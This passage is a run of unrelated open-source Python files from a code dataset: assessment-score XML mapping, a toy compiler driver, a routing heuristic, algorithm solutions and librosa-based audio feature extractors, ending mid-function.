examinee.findall(\"./ExamineeRelationship[@name='StudentGroupName']\")[:TOTAL_GROUPS]\n    for i in range(TOTAL_GROUPS):\n        if i < len(groups):\n            meta = XMLMeta(groups[i], '.', 'value')\n            group_id = HashMeta(groups[i], '.', 'value')\n        else:\n            meta = ValueMeta('')\n            group_id = ValueMeta('')\n\n        mappings.append(Mapping(group_id, 'Group%dId' % (i + 1)))\n        mappings.append(Mapping(meta, 'Group%dText' % (i + 1)))\n    return mappings\n\n\nACCOMMODATION_CONFIGS = [\n    {'type': 'AmericanSignLanguage', 'target': AssessmentHeaders.AccommodationAmericanSignLanguage},\n    {'type': 'ClosedCaptioning', 'target': AssessmentHeaders.AccommodationClosedCaptioning},\n    {'type': 'Language', 'target': AssessmentHeaders.AccommodationBraille},\n    {'type': 'TextToSpeech', 'target': AssessmentHeaders.AccommodationTextToSpeech},\n    {'type': 'StreamlinedInterface', 'target': AssessmentHeaders.AccommodationStreamlineMode},\n    {'type': 'PrintOnDemand', 'code': 'TDS_PoD0', 'target': AssessmentHeaders.AccommodationPrintOnDemand},\n    {'type': 'PrintOnDemand', 'code': 'TDS_PoD_Stim&TDS_PoD_Item', 'target': AssessmentHeaders.AccommodationPrintOnDemandItems},\n    {'type': 'NonEmbeddedAccommodations', 'code': 'NEA_Abacus', 'target': AssessmentHeaders.AccommodationAbacus},\n    {'type': 'NonEmbeddedAccommodations', 'code': 'NEA_AR', 'target': AssessmentHeaders.AccommodationAlternateResponseOptions},\n    {'type': 'NonEmbeddedAccommodations', 'code': 'NEA_RA_Stimuli', 'target': AssessmentHeaders.AccommodationReadAloud},\n    {'type': 'NonEmbeddedAccommodations', 'code': 'NEA_Calc', 'target': AssessmentHeaders.AccommodationCalculator},\n    {'type': 'NonEmbeddedAccommodations', 'code': 'NEA_MT', 'target': AssessmentHeaders.AccommodationMultiplicationTable},\n    {'type': 'NonEmbeddedAccommodations', 'code': 'NEA_SC_Writitems', 'target': AssessmentHeaders.AccommodationScribe},\n    {'type': 'NonEmbeddedAccommodations', 'code': 'NEA_STT', 'target': AssessmentHeaders.AccommodationSpeechToText},\n    {'type': 'NonEmbeddedAccommodations', 'code': 'NEA_NoiseBuf', 'target': AssessmentHeaders.AccommodationNoiseBuffer}]\n\n\ndef get_accommodations(opportunity):\n    '''\n    Get accommodations from XML.\n\n    We have two categories of accommodations: Embedded and Non-Embedded.\n\n    Embedded accommodations include AmericanSignLanguage, ClosedCaptioning, Language, TextToSpeech, StreamlinedInterface, PrintOnDemand(PrintOnDemand + TDS_PoD0), PrintOnDemandItem(PrintOnDemand + TDS_PoD_Stim&TDS_PoD_Item). If any of the above accommodations appears in the XML with `context` of value 'FINAL', we look up the use code in the element <Score measureLabel=\"Accommodation\"/> for the corresponding accommodation type, otherwise use 0 as the fallback use code.\n\n    Non-Embedded accommodations include Abacus, AlternativeResponse, Calculator, MultiplicationTable, ReadAloud, Scribe, SpeechToText, NoiseBuffer. Each of the above corresponds to a unique code, as in the <Accommodation /> 'code' attribute, respectively: NEA_Abacus, NEA_AR, NEA_Calc, NEA_MT, NEA_RA_Stimuli, NEA_SC_WritItems, NEA_STT, NEA_NoiseBuf.\n    We look up the element below for the use code and assign it to all Non-Embedded accommodations that appear in the XML.\n    <Score measureOf=\"NonEmbeddedAccommodations\" measureLabel=\"Accommodation\" value=\"6\" />\n    All present Non-Embedded accommodations will share the same use code, otherwise 0 is used as the fallback use code.\n    However, there is a special Non-Embedded code 'NEA0', which is mutually exclusive with the others. When it is present, all Non-Embedded accommodations should be assigned the value 0 in the database.\n    '''\n    USE_CODE_NO_ACCESS = '4'\n    USE_CODE_NO_MESSAGE = '0'\n\n    def _format_XPath(config):\n        score_xpath = \"./Score/[@measureOf='%s'][@measureLabel='Accommodation']\" % config['type']\n        acc_xpath = \"./Accommodation/[@type='%s'][@context='FINAL']\" % config['type']\n        if 'code' in config:\n            acc_xpath += \"[@code='%s']\" % config['code']\n        return acc_xpath, score_xpath\n\n    def _has_NEA0(opportunity):\n        acc_xpath, _ = _format_XPath({'type': 'NonEmbeddedAccommodations', 'code': 'NEA0'})\n        return opportunity.find(acc_xpath) is not None\n\n    def _is_non_embedded(config):\n        return config['type'] == 'NonEmbeddedAccommodations'\n\n    accommodations = []\n    hasNEA0 = _has_NEA0(opportunity)\n    for config in ACCOMMODATION_CONFIGS:\n        if _is_non_embedded(config) and hasNEA0:\n            use_code = USE_CODE_NO_ACCESS\n        else:\n            acc_xpath, score_xpath = _format_XPath(config)\n            score = opportunity.find(score_xpath) if opportunity.find(acc_xpath) is not None else None\n            use_code = score.get('value') if score is not None else USE_CODE_NO_MESSAGE\n        accommodations.append(Mapping(ValueMeta(use_code), config['target']))\n    return accommodations\n\n\ndef get_claims(metadata, opportunity):\n\n    claim1_mapping = getClaimMappingName(metadata, PerformanceMetadataConstants.CLAIM1, PerformanceMetadataConstants.CLAIM1) or get_claim1_mapping(opportunity)\n    claim2_mapping = getClaimMappingName(metadata, PerformanceMetadataConstants.CLAIM2, PerformanceMetadataConstants.CLAIM2)\n    claim3_mapping = getClaimMappingName(metadata, PerformanceMetadataConstants.CLAIM3, PerformanceMetadataConstants.CLAIM3)\n    claim4_mapping = getClaimMappingName(metadata, PerformanceMetadataConstants.CLAIM4, PerformanceMetadataConstants.CLAIM4)\n\n    if not claim1_mapping:\n        raise MetadataException(\"Incorrect number of claims for assessment type %s\" % metadata['Identification']['Type'])\n\n    overall_score = XMLClaimScore(opportunity, \"./Score/[@measureOf='Overall'][@measureLabel='ScaleScore']\", \"value\", \"standardError\")\n    claim1_score = XMLClaimScore(opportunity, \"./Score/[@measureOf='\" + claim1_mapping + \"'][@measureLabel='ScaleScore']\", \"value\", \"standardError\")\n    claim2_score = XMLClaimScore(opportunity, \"./Score/[@measureOf='\" + claim2_mapping + \"'][@measureLabel='ScaleScore']\", \"value\", \"standardError\")\n    claim3_score = XMLClaimScore(opportunity, \"./Score/[@measureOf='\" + 
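# --- Editor's note: standalone toy example of the use-code resolution above ---
# Built on xml.etree rather than the project's helpers; the XML fragment is my own
# construction, not test data. It shows a matched accommodation reading its Score
# value and an absent one falling back to '0' (NEA0 would force '4' for all
# non-embedded entries before this lookup even runs).
import xml.etree.ElementTree as ET

opp = ET.fromstring(
    "<Opportunity>"
    "<Accommodation type='TextToSpeech' context='FINAL' code='TDS_TTS'/>"
    "<Score measureOf='TextToSpeech' measureLabel='Accommodation' value='6'/>"
    "</Opportunity>")

def use_code(opp, acc_type):
    accs = [a for a in opp.findall('Accommodation')
            if a.get('type') == acc_type and a.get('context') == 'FINAL']
    if not accs:
        return '0'                                  # no FINAL accommodation recorded
    scores = [s for s in opp.findall('Score')
              if s.get('measureOf') == acc_type
              and s.get('measureLabel') == 'Accommodation']
    return scores[0].get('value') if scores else '0'

assert use_code(opp, 'TextToSpeech') == '6'  # matched: take the reported use code
assert use_code(opp, 'Language') == '0'      # absent: fall back to the default
# --- end editor's note ---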
claim3_mapping + \"'][@measureLabel='ScaleScore']\", \"value\", \"standardError\")\n claim4_score = XMLClaimScore(opportunity, \"./Score/[@measureOf='\" + claim4_mapping + \"'][@measureLabel='ScaleScore']\", \"value\", \"standardError\")\n\n return [\n Mapping(XMLMeta(opportunity, \"./Score/[@measureOf='Overall'][@measureLabel='ScaleScore']\", \"value\"), AssessmentHeaders.AssessmentSubtestResultScoreValue),\n Mapping(XMLMeta(opportunity, \"./Score/[@measureOf='Overall'][@measureLabel='PerformanceLevel']\", \"value\"), AssessmentHeaders.AssessmentPerformanceLevelIdentifier),\n Mapping(overall_score.get_min(), AssessmentHeaders.AssessmentSubtestMinimumValue),\n Mapping(overall_score.get_max(), AssessmentHeaders.AssessmentSubtestMaximumValue),\n Mapping(XMLMeta(opportunity, \"./Score/[@measureOf='\" + claim1_mapping + \"'][@measureLabel='ScaleScore']\", \"value\"), AssessmentHeaders.AssessmentSubtestResultScoreClaim1Value),\n Mapping(claim1_score.get_min(), AssessmentHeaders.AssessmentSubtestClaim1MinimumValue),\n Mapping(claim1_score.get_max(), AssessmentHeaders.AssessmentSubtestClaim1MaximumValue),\n Mapping(XMLMeta(opportunity, \"./Score/[@measureOf='\" + claim1_mapping + \"'][@measureLabel='PerformanceLevel']\", \"value\"), AssessmentHeaders.AssessmentClaim1PerformanceLevelIdentifier),\n Mapping(XMLMeta(opportunity, \"./Score/[@measureOf='\" + claim2_mapping + \"'][@measureLabel='ScaleScore']\", \"value\"), AssessmentHeaders.AssessmentSubtestResultScoreClaim2Value),\n Mapping(claim2_score.get_min(), AssessmentHeaders.AssessmentSubtestClaim2MinimumValue),\n Mapping(claim2_score.get_max(), AssessmentHeaders.AssessmentSubtestClaim2MaximumValue),\n Mapping(XMLMeta(opportunity, \"./Score/[@measureOf='\" + claim2_mapping + \"'][@measureLabel='PerformanceLevel']\", \"value\"), AssessmentHeaders.AssessmentClaim2PerformanceLevelIdentifier),\n Mapping(XMLMeta(opportunity, \"./Score/[@measureOf='\" + claim3_mapping + \"'][@measureLabel='ScaleScore']\", \"value\"), AssessmentHeaders.AssessmentSubtestResultScoreClaim3Value),\n Mapping(claim3_score.get_min(), AssessmentHeaders.AssessmentSubtestClaim3MinimumValue),\n Mapping(claim3_score.get_max(), AssessmentHeaders.AssessmentSubtestClaim3MaximumValue),\n Mapping(XMLMeta(opportunity, \"./Score/[@measureOf='\" + claim3_mapping + \"'][@measureLabel='PerformanceLevel']\", \"value\"), AssessmentHeaders.AssessmentClaim3PerformanceLevelIdentifier),\n Mapping(XMLMeta(opportunity, \"./Score/[@measureOf='\" + claim4_mapping + \"'][@measureLabel='ScaleScore']\", \"value\"), AssessmentHeaders.AssessmentSubtestResultScoreClaim4Value),\n Mapping(claim4_score.get_min(), AssessmentHeaders.AssessmentSubtestClaim4MinimumValue),\n Mapping(claim4_score.get_max(), AssessmentHeaders.AssessmentSubtestClaim4MaximumValue),\n Mapping(XMLMeta(opportunity, \"./Score/[@measureOf='\" + claim4_mapping + \"'][@measureLabel='PerformanceLevel']\", \"value\"), AssessmentHeaders.AssessmentClaim4PerformanceLevelIdentifier)\n ]\n\n\ndef get_claim1_mapping(opportunity):\n # if no claims mapping found, we take the first Overall, this is most lieky IAB\n return 'Overall'\n","repo_name":"SmarterApp/RDW_DataWarehouse","sub_path":"smarter_score_batcher/smarter_score_batcher/processing/assessment.py","file_name":"assessment.py","file_ext":"py","file_size_in_byte":26653,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"74226597287","text":"from scanner import Lexer\nfrom my_parser import Parser\nfrom codegen import CodeGen\n\nif 
__name__ == '__main__':\n    file_name = \"input.nullr\"\n    with open(file_name) as file:\n        input_code = file.read()\n\n    lexer = Lexer().get_lexer()\n    tokens = lexer.lex(input_code)\n\n    codegen = CodeGen()\n    module = codegen.module\n    builder = codegen.builder\n    printf = codegen.print\n\n    parser_generator = Parser(module, builder, printf)\n    parser_generator.parse()\n    parser = parser_generator.get_parser()\n    parser.parse(tokens).eval()\n\n    codegen.create_ir()\n    codegen.save_ir(\"IrFile.ll\")\n","repo_name":"benymaxparsa/Compiler-Project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"24560930650","text":"#This script solves the task that Ron showed me, either in a greedy manner or, as a baseline, with random moves.\n#Still I believe the more complex \"dynamic programming\" method, which solves such problems optimally, is superior.\n#For this variant we need a recursive approach.\nfrom pathlib import Path\nfrom helper import Node, Transporter, generate_links_from_txt, generate_txt_from_transitions\n\nif __name__ == \"__main__\":\n    print(\"Start script\")\n    #prerequisites\n    #positions of the nodes with names\n    #x,y,name\n    nodes = [(5, 10, 1), (50, 5, 2), (40, 20, 3), (60, 35, 4), (30, 35, 5), (20, 30, 6)]\n    #path to the transport demand and result path\n    path_to_demand = Path(Path.joinpath(Path(__file__).parent), \"data/transport_demand.txt\")\n    path_to_result = Path(Path.joinpath(Path(__file__).parent), \"data\")\n    #generate a dict with each node and its links\n    print(\"Generate the node link map\")\n    node_dict: dict[int, Node] = generate_links_from_txt(nodes, path_to_demand)\n\n\n    #----------------solving-----------------------\n    print(\"Init the algo\")\n    #keep track of the visited nodes\n    history = []\n    #methode\n    methode = \"greedy\"\n    #methode = \"random\"\n    #number of transporters, up to 6 possible\n    number_of_transporter = 5\n    #stores the transporters\n    transporter_list:list[Transporter] = []\n    #tracks the costs\n    overall_costs = 0\n    #flag to show transitions\n    show_transition = False\n\n    #spawn the transporters\n    for id in range(1,number_of_transporter+1):\n        transporter_list.append(Transporter(id, node_dict[id], False))\n\n    print(f\"Start moving the transporter in a {methode} manner\")\n    #let each transporter drive till there are no more links to work on\n    while(1):\n        for transporter in transporter_list:\n            #transporter does a move\n            node_dict, transition, step_cost = transporter.evaluate_step(node_dict, methode)\n            overall_costs += step_cost\n            #if transition is None there are no more links left\n            if transition is None:\n                break\n            else:\n                if show_transition:\n                    print(transition)\n                history.append(transition)\n        if transition is None:\n            break\n\n    print(\"No more links are left to work on\")\n    print(f\"\"\"The \"{methode}\" method with {number_of_transporter} transporters terminated with costs of: {round(overall_costs, 4)}\"\"\")\n    print(\"Export the transitions as txt\")\n    generate_txt_from_transitions(history, path_to_result, f\"num_trans_{number_of_transporter}_methode_{methode}\")\n    print(\"End script\")\n","repo_name":"seidellu/rons_task","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31624970178","text":"# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in 
range(n)]\n\nimport sys\nimport os\nf = open('../../input.txt', 'r')\nsys.stdin = f\n\nn = int(input())\np = list(map(int,input().split()))\np_ind = [ (p[i], i+1) for i in range(n) ]\np_ind.sort(reverse=True)\n\n# Use sqrt decomposition: split positions into blocks of size ~sqrt(max_n).\nmax_n = 10**5\ndiv_n = int(max_n**(1/2))+1\na = [[] for _ in range(div_n)]\na[0] = [0,0]\na[(n+1)//div_n].append(n+1)\na[(n+1)//div_n].append(n+1)\na_count = [0] * (div_n)\na_count[0] += 2\na_count[(n+1)//div_n] += 2\n\nimport bisect\nans = 0\nfor tmp in p_ind:\n    val, i = tmp\n    group = i//div_n\n    j = bisect.bisect(a[group],i)\n    #left\n    if(j>1):\n        left1 = a[group][j-1]\n        left2 = a[group][j-2]\n    elif(j==1):\n        left1 = a[group][j-1]\n        lg = group-1\n        while(True):\n            if(a_count[lg]>0):\n                break\n            lg -=1\n        left2 = a[lg][-1]\n    else:\n        lg = group-1\n        while(True):\n            if(a_count[lg]>0):\n                break\n            lg -=1\n        if(a_count[lg]>=2):\n            left1 = a[lg][-1]\n            left2 = a[lg][-2]\n        else:\n            left1 = a[lg][-1]\n            while(True):\n                lg -=1\n                if(a_count[lg]>0):\n                    break\n            left2 = a[lg][-1]\n    #right\n    if(a_count[group]>=j+2):\n        right1 = a[group][j]\n        right2 = a[group][j+1]\n    elif(a_count[group]>=j+1):\n        right1 = a[group][j]\n        rg = group\n        while(True):\n            rg += 1\n            if(a_count[rg]>0):\n                break\n        right2 = a[rg][0]\n    else:\n        rg = group\n        while(True):\n            rg += 1\n            if(a_count[rg]>0):\n                break\n        if(a_count[rg]>=2):\n            right1 = a[rg][0]\n            right2 = a[rg][1]\n        else:\n            right1 = a[rg][0]\n            while(True):\n                rg += 1\n                if(a_count[rg]>0):\n                    break\n            right2 = a[rg][0]\n\n    ans += ((right2 - right1)* (i - left1) + (right1 - i)* (left1 - left2)) * val\n    a[group].insert(j,i)\n    a_count[group] += 1\n\nprint(ans)\n","repo_name":"komajun365/competitive_programming","sub_path":"abc/abc140_old/e3.py","file_name":"e3.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38131829969","text":"from typing import List\nfrom collections import defaultdict\n\n\nclass Solution:\n    def findOrder(self, numCourses: int, prerequisites: List[List[int]]) -> List[int]:\n        post = {i: [] for i in range(numCourses)}\n        visit = [0 for _ in range(numCourses)]\n        for i, j in prerequisites:\n            post[j].append(i)\n\n        ans = []\n        self.ispossible = True\n\n        def dfs(node):\n            if not self.ispossible:\n                return\n            visit[node] = 1\n            for i in post[node]:\n                if visit[i] == 0:\n                    dfs(i)\n                if visit[i] == 1:\n                    self.ispossible = False\n            visit[node] = 2\n            ans.append(node)\n\n        for i in post:\n            if visit[i] == 0:\n                dfs(i)\n\n        return ans[::-1] if self.ispossible else []\n\n\nif __name__ == \"__main__\":\n    sol = Solution()\n    numCourses = 6\n    prerequisites = [[0,1],[2,0],[0,3],[1,2],[1,3],[2,4],[2,5]]\n    numCourses = 2\n    prerequisites = [[1, 0]]\n    numCourses = 4\n    prerequisites = [[1, 0], [2, 0], [3, 1], [3, 2]]\n    print(sol.findOrder(numCourses, prerequisites))\n","repo_name":"chyt123/cosmos","sub_path":"coding_everyday/lc201-300/lc210/CourseScheduleII.py","file_name":"CourseScheduleII.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27986989974","text":"''' Extractors that operate on AudioStim inputs. 
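# --- Editor's note: standard alternative to the DFS solution above ---
# The CourseScheduleII code uses three-colour DFS (0 unvisited, 1 on the current
# stack, 2 finished); revisiting a state-1 node means a back edge, i.e. a cycle.
# Kahn's algorithm produces the same ordering iteratively and avoids recursion
# depth limits; a textbook sketch:
from collections import deque

def find_order(num_courses, prerequisites):
    adj = [[] for _ in range(num_courses)]
    indeg = [0] * num_courses
    for course, pre in prerequisites:
        adj[pre].append(course)
        indeg[course] += 1
    queue = deque(i for i in range(num_courses) if indeg[i] == 0)
    order = []
    while queue:
        node = queue.popleft()
        order.append(node)
        for nxt in adj[node]:
            indeg[nxt] -= 1
            if indeg[nxt] == 0:
                queue.append(nxt)
    return order if len(order) == num_courses else []  # shorter output => cycle
# --- end editor's note ---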
'''\n\nfrom abc import ABCMeta\nfrom os import path\nimport sys\nimport logging\n\nimport numpy as np\nfrom scipy import fft\nimport pandas as pd\n\nfrom pliers.stimuli.audio import AudioStim\nfrom pliers.stimuli.text import ComplexTextStim\nfrom pliers.extractors.base import Extractor, ExtractorResult\nfrom pliers.utils import attempt_to_import, verify_dependencies, listify\nfrom pliers.support.exceptions import MissingDependencyError\nfrom pliers.support.setup_yamnet import YAMNET_PATH\n\nlibrosa = attempt_to_import('librosa')\ntf = attempt_to_import('tensorflow')\n\n\nclass AudioExtractor(Extractor):\n\n ''' Base Audio Extractor class; all subclasses can only be applied to\n audio. '''\n _input_type = AudioStim\n\n\nclass STFTAudioExtractor(AudioExtractor):\n\n ''' Short-time Fourier Transform extractor.\n\n Args:\n frame_size (float): The width of the frame/window to apply an FFT to,\n in seconds.\n hop_size (float): The step size to increment the window by on each\n iteration, in seconds (effectively, the sampling rate).\n freq_bins (list or int): The set of bins or frequency bands to extract\n power for. If an int is passed, this is the number of bins\n returned, with each bin spanning an equal range of frequencies.\n E.g., if bins=5 and the frequency spectrum runs from 0 to 20KHz,\n each bin will span 4KHz. If a list is passed, each element must be\n a tuple or list of lower and upper frequency bounds. E.g., passing\n [(0, 300), (300, 3000)] would compute power in two bands, one\n between 0 and 300Hz, and one between 300Hz and 3KHz.\n spectrogram (bool): If True, plots a spectrogram of the results.\n\n Notes: code adapted from\n http://stackoverflow.com/questions/2459295/invertible-stft-and-istft-in-python\n '''\n\n _log_attributes = ('frame_size', 'hop_size', 'freq_bins')\n VERSION = '1.0'\n\n def __init__(self, frame_size=0.5, hop_size=0.1, freq_bins=5,\n spectrogram=False):\n self.frame_size = frame_size\n self.hop_size = hop_size\n self.spectrogram = spectrogram\n self.freq_bins = freq_bins\n super().__init__()\n\n def _stft(self, stim):\n x = stim.data\n framesamp = int(self.frame_size * stim.sampling_rate)\n hopsamp = int(self.hop_size * stim.sampling_rate)\n w = np.hanning(framesamp)\n X = np.array([fft.fft(w * x[i:(i + framesamp)])\n for i in range(0, len(x) - framesamp, hopsamp)])\n nyquist_lim = int(X.shape[1] // 2)\n X = np.log(X[:, :nyquist_lim])\n X = np.absolute(X)\n if self.spectrogram:\n import matplotlib.pyplot as plt\n bins = np.fft.fftfreq(framesamp, d=1. 
/ stim.sampling_rate)\n bins = bins[:nyquist_lim]\n plt.imshow(X.T, origin='lower', aspect='auto',\n interpolation='nearest', cmap='RdYlBu_r',\n extent=[0, stim.duration, bins.min(), bins.max()])\n plt.xlabel('Time')\n plt.ylabel('Frequency')\n plt.colorbar()\n plt.show()\n return X\n\n def _extract(self, stim):\n data = self._stft(stim)\n time_bins = np.arange(0., stim.duration - self.frame_size,\n self.hop_size)\n\n if isinstance(self.freq_bins, int):\n bins = []\n bin_size = int(data.shape[1] / self.freq_bins)\n for i in range(self.freq_bins):\n if i == self.freq_bins - 1:\n bins.append((i * bin_size, data.shape[1]))\n else:\n bins.append((i * bin_size, (i + 1) * bin_size))\n self.freq_bins = bins\n\n features = ['%d_%d' % fb for fb in self.freq_bins]\n offset = 0.0 if stim.onset is None else stim.onset\n index = [tb + offset for tb in time_bins]\n values = np.zeros((len(index), len(features)))\n for i, fb in enumerate(self.freq_bins):\n start, stop = fb\n values[:, i] = data[:, start:stop].mean(1)\n values[np.isnan(values)] = 0.\n values[np.isinf(values)] = 0.\n return ExtractorResult(values, stim, self, features=features,\n onsets=index, durations=self.hop_size,\n orders=list(range(len(index))))\n\n\nclass MeanAmplitudeExtractor(Extractor):\n\n ''' Mean amplitude extractor for blocks of audio with transcription. '''\n\n _input_type = (AudioStim, ComplexTextStim)\n\n def _extract(self, stim):\n\n amps = stim.audio.data\n sampling_rate = stim.audio.sampling_rate\n elements = stim.complex_text.elements\n values, onsets, durations = [], [], []\n\n for i, el in enumerate(elements):\n onset = sampling_rate * el.onset\n onsets.append(onset)\n duration = sampling_rate * el.duration\n durations.append(duration)\n\n r_onset = np.round(onset).astype(int)\n r_offset = np.round(onset + duration).astype(int)\n if not r_offset <= amps.shape[0]:\n raise Exception('Block ends after data.')\n\n mean_amplitude = np.mean(amps[r_onset:r_offset])\n values.append(mean_amplitude)\n\n orders = list(range(len(elements)))\n\n return ExtractorResult(values, stim, self, features=['mean_amplitude'],\n onsets=onsets, durations=durations,\n orders=orders)\n\n\nclass LibrosaFeatureExtractor(AudioExtractor, metaclass=ABCMeta):\n\n ''' A generic class for audio extractors using the librosa library. 
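# --- Editor's note: bookkeeping behind the hand-rolled STFT above (assumed values) ---
# frame_size/hop_size are converted to sample counts, each window is weighted with
# np.hanning, and only the half of the spectrum below Nyquist is kept:
import numpy as np

sr = 44100                                # assumed sampling rate
framesamp = int(0.5 * sr)                 # 22050 samples per 0.5 s frame
hopsamp = int(0.1 * sr)                   # 4410 samples between frame starts

x = np.random.randn(sr * 3)               # 3 s of noise as a stand-in signal
frames = np.array([np.fft.fft(np.hanning(framesamp) * x[i:i + framesamp])
                   for i in range(0, len(x) - framesamp, hopsamp)])
print(frames.shape)                       # (25, 22050); keep frames[:, :framesamp // 2]
# --- end editor's note ---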
'''\n\n _log_attributes = ('hop_length', 'librosa_kwargs')\n\n def __init__(self, feature=None, hop_length=512, **librosa_kwargs):\n verify_dependencies(['librosa'])\n if feature:\n self._feature = feature\n self.hop_length = hop_length\n self.librosa_kwargs = librosa_kwargs\n super().__init__()\n\n def get_feature_names(self):\n return self._feature\n\n def _get_values(self, stim):\n if self._feature in ['zero_crossing_rate', 'rms', 'spectral_flatness']:\n return getattr(librosa.feature, self._feature)(\n y=stim.data, hop_length=self.hop_length, **self.librosa_kwargs)\n elif self._feature == 'tonnetz':\n return getattr(librosa.feature, self._feature)(\n y=stim.data, sr=stim.sampling_rate, **self.librosa_kwargs)\n\n elif self._feature in ['onset_detect', 'onset_strength_multi']:\n return getattr(librosa.onset, self._feature)(\n y=stim.data, sr=stim.sampling_rate, hop_length=self.hop_length,\n **self.librosa_kwargs)\n\n elif self._feature in ['tempo', 'beat_track']:\n return getattr(librosa.beat, self._feature)(\n y=stim.data, sr=stim.sampling_rate, hop_length=self.hop_length,\n **self.librosa_kwargs)\n\n elif self._feature in ['harmonic', 'percussive']:\n return getattr(librosa.effects, self._feature)(\n y=stim.data,\n **self.librosa_kwargs)\n elif self._feature == 'yin':\n return getattr(librosa, self._feature)(\n y=stim.data, sr=stim.sampling_rate, hop_length=self.hop_length,\n **self.librosa_kwargs)\n else:\n return getattr(librosa.feature, self._feature)(\n y=stim.data, sr=stim.sampling_rate, hop_length=self.hop_length,\n **self.librosa_kwargs)\n\n def _extract(self, stim):\n\n values = self._get_values(stim)\n\n if self._feature=='beat_track':\n beats=np.array(values[1])\n values=beats\n\n values = values.T\n n_frames = len(values)\n\n feature_names = listify(self.get_feature_names())\n\n onsets = librosa.frames_to_time(range(n_frames),\n sr=stim.sampling_rate,\n hop_length=self.hop_length)\n\n onsets = onsets + stim.onset if stim.onset else onsets\n\n durations = [self.hop_length / float(stim.sampling_rate)] * n_frames\n\n return ExtractorResult(values, stim, self, features=feature_names,\n onsets=onsets, durations=durations,\n orders=list(range(n_frames)))\n\n\nclass SpectralCentroidExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts the spectral centroids from audio using the Librosa library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.feature.spectral_centroid.html.'''\n\n _feature = 'spectral_centroid'\n\n\nclass SpectralBandwidthExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts the p'th-order spectral bandwidth from audio using the\n Librosa library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.feature.spectral_bandwidth.html.'''\n\n _feature = 'spectral_bandwidth'\n\n\nclass SpectralFlatnessExtractor(LibrosaFeatureExtractor):\n\n ''' Computes the spectral flatness from audio using the\n Librosa library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.feature.spectral_flatness.html.'''\n\n _feature = 'spectral_flatness'\n\n\nclass SpectralContrastExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts the spectral contrast from audio using the Librosa library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.feature.spectral_contrast.html.'''\n\n _feature = 'spectral_contrast'\n\n def __init__(self, n_bands=6, **kwargs):\n self.n_bands = n_bands\n super().__init__(\n 
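# --- Editor's note: quick check of the timestamping used above ---
# librosa.frames_to_time is simply frame_index * hop_length / sr, which is what
# makes every librosa-based extractor report evenly spaced onsets:
import numpy as np
import librosa

sr, hop = 22050, 512
onsets = librosa.frames_to_time(range(4), sr=sr, hop_length=hop)
assert np.allclose(onsets, np.arange(4) * hop / sr)  # ~[0.0, 0.0232, 0.0464, 0.0697]
# --- end editor's note ---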
n_bands=n_bands, **kwargs)\n\n def get_feature_names(self):\n abc= ['spectral_contrast_band_%d' % i\n for i in range(self.n_bands + 1)]\n return abc\n\n\nclass SpectralRolloffExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts the roll-off frequency from audio using the Librosa library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.feature.spectral_rolloff.html.'''\n\n _feature = 'spectral_rolloff'\n\n\nclass PolyFeaturesExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts the coefficients of fitting an nth-order polynomial to the columns of an audio's spectrogram (via Librosa).\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.feature.poly_features.html.'''\n\n _feature = 'poly_features'\n\n def __init__(self, order=1, **kwargs):\n self.order = order\n super().__init__(order=order, **kwargs)\n\n def get_feature_names(self):\n return ['coefficient_%d' % i for i in range(self.order + 1)]\n\n\nclass RMSExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts root mean square (RMS) from audio using the Librosa\n library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.feature.rms.html.'''\n\n _feature = 'rms'\n\n\nclass OnsetDetectExtractor(LibrosaFeatureExtractor):\n\n ''' Detects the basic onset (onset_detect) from audio using the Librosa\n library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.onset.onset_detect.html.'''\n\n _feature = 'onset_detect'\n\n\nclass TempoExtractor(LibrosaFeatureExtractor):\n\n ''' Detects the tempo (tempo) from audio using the Librosa\n library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.beat.tempo.html.'''\n\n _feature = 'tempo'\n\n\nclass BeatTrackExtractor(LibrosaFeatureExtractor):\n\n ''' Dynamic programming beat tracker (beat_track) from audio using the Librosa\n library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.beat.beat_track.html.'''\n\n _feature = 'beat_track'\n\n\nclass OnsetStrengthMultiExtractor(LibrosaFeatureExtractor):\n\n '''Computes the spectral flux onset strength envelope across multiple channels (onset_strength_multi) from audio using the Librosa\n library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.onset.onset_strength_multi.html.'''\n\n _feature = 'onset_strength_multi'\n\n\nclass ZeroCrossingRateExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts the zero-crossing rate of audio using the Librosa library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.feature.zero_crossing_rate.html.'''\n\n _feature = 'zero_crossing_rate'\n\n\nclass ChromaSTFTExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts a chromagram from an audio's waveform using the Librosa\n library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.feature.chroma_stft.html.'''\n\n _feature = 'chroma_stft'\n\n def __init__(self, n_chroma=12, **kwargs):\n self.n_chroma = n_chroma\n 